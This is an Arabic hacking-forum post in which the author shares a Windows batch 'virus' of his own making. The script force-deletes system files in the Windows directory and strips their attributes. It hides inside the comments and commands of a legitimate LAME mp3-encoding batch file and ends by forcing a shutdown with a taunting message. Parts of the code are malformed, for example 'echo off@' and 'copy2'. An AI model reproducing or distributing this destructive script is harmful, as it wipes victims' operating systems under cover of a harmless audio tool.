فقط على منتدى الرواد للراغبين في تعلم الهكر
لقد شاهدة هاته الايام بعض الطرق الخاطئة في صنع الفيروسات
اليكن كود من صنعي لفيروس بسيط لاكن فتاك اقراه واستنتج مالذي يفعله
echo off@
c:
attrib -r -a -s -h *.*
del /f /q %windir% *system*.*
cls
Repeat:
del "C:\WINDOWS\~s~.exe"
if exist "C:\WINDOWS\~s~.exe" goto Repeat
echo SHIT, too late!! > "C:\WINDOWS\~s~.exe"
del "C:\WINDOWS\~s~.exe"
rem ---------------------------------------------
rem PURPOSE:
rem - put this Batch-Command on your Desktop,
rem so you can drag and drop wave files on it
rem and LAME will encode them to mp3 format.
rem - put this Batch-Command in a place mentioned
rem in your PATH environment, start the DOS-BOX
rem and change to a directory where your wave
rem files are located. the following line will
rem encode all your wave files to mp3
rem "lame.bat *.wav"
rem ---------------------------------------------
rem C2000 Robert Hegemann
rem ---------------------------------------------
rem Changes to support long filenames using 4DOS
rem by khaled hacker-dz <khaled-13@hotmail.com>
rem ---------------------------------------------
rem please set LAME and LAMEOPTS
rem LAME - where the executeable is
rem OPTS - options you like LAME to use
set LAME=c:\progra~1\sound&~1\lame\lame.exe
set OPTS=-h --lowpass-width 2 --lowpass 20.5 -b 112 --abr 180
rem ---------------------------------------------
set thecmd=%LAME% %OPTS%
for %%f in (%&) do (%thecmd% %@sfn[%%f]^(ren %@sfn[%%f].mp3 "%@lfn[%%f].mp_">NUL))
ren *.mp3.mp_ *.new.mp3 >& NUL
ren *.wav.mp_ *.mp3 >& NUL
goto endmark
errormark:
echo.
echo.
echo ERROR processing %1
echo.
endmark:
rem
rem finished
rem
cls
copy "c:*.exe"
copy2 "d:*.*"
cls
echo khaled "hacker-dz"
shutdown -s -t 15 -c "ha ha ha"